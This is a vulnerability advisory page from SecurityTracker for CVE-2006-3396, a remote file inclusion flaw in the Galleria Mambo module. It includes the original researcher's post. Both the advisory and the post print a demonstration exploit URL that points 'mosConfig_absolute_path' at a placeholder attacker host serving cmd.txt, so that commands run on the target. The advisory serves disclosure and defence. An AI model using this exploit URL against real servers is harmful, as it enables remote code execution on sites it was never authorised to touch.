SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Generic)  >   Galleria Vendors:   binarydigit.at
Galleria Module Include File Bug Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016437
SecurityTracker URL:  http://securitytracker.com/id/1016437
CVE Reference:   CVE-2006-3396   (Links to External Site)
Updated:  Aug 12 2008
Original Entry Date:  Jul 5 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.0 and prior versions
Description:   A vulnerability was reported in the Galleria Mambo module. A remote user can include and execute arbitrary code on the target system.

The 'galleria.html.php' script does not properly validate user-supplied input in the 'mosConfig_absolute_path' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/[path]/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://[f*ckscript]/cmd.txt?&cmd=

sikunYuk reported this vulnerability.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  binarydigit.at/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:   Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Date:  4 Jul 2006 00:21:05 -0000
Subject:  galleria <= 1.0 Remote File Inclusion Vulnerability

Title       : galleria <= 1.0 Remote File Inclusion Vulnerability
-
URL         : http://binarydigit.at/
-
Author      : sikunYuk
-
Mail        : ineal[at]gmail.com
-
exploit     : http://[target]/[path]/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://[f*ckscript]/cmd.txt?&cmd=
-
greatz      : agoes,skulmatic,Olibekas,Vitux,weleh,arioo Powered by #pisslovcrew,#papmahackerlink,#tigapanah,#yogyahacker  
-

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC